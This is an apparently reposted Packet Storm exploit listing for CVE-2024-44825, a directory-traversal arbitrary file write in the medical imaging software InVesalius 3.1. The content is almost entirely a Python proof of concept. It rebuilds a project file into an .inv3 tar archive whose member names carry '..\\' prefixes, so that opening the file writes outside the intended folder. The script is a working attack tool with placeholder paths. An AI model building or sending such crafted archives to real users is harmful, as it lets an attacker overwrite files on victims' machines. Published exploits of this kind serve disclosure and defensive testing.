Invesalius 3.1 Arbitrary File Write / Directory Traversal
2024-9-23 23:2:49 Author: packetstormsecurity.com(查看原文) 阅读量:7 收藏

# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal 
# Discovered By: Riccardo Degli Esposti (partywave)
# Exploit Author: Riccardo Degli Esposti (partywave)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: from 3.1.99995
# Tested on: Windows
# CVE-ID: CVE-2024-44825

import tarfile
import os
import zipfile

# Disclaimer:
# Tested on Windows
# edit every [CHANGEME] before run this script

# Step 0: Setup local paths
# Adapt your paths
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'

output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'

main_plist_path = os.path.join(extracted_folder, 'main.plist')

# Ensure the extraction directory exists
os.makedirs(extracted_folder, exist_ok=True)

# Step 1: Extract the ZIP file
with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
zip_ref.extractall(extracted_folder)

with open(main_plist_path, 'r') as file:
main_plist_content = file.read()

# POC of loading new XML
main_plist_content = main_plist_content.replace(
'<string>ProMED CT 0051</string>',
'<string>This is a confirmation modifying the XML</string>'
)

with open(main_plist_path, 'w') as file:
file.write(main_plist_content)

# Step 3: Create the tar archive
# Adapt where you want write
def rename(tarinfo):
tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name
return tarinfo

with tarfile.open(output_tar, "w:xz") as tar:
for root, _, files in os.walk(extracted_folder):
for file in files:
full_path = os.path.join(root, file)
arcname = os.path.relpath(full_path, extracted_folder)
tar.add(full_path, arcname=arcname, filter=rename)

output_tar


文章来源: https://packetstormsecurity.com/files/181738/invesalius31-filewritetraversal.txt
如有侵权请联系:admin#unsafe.sh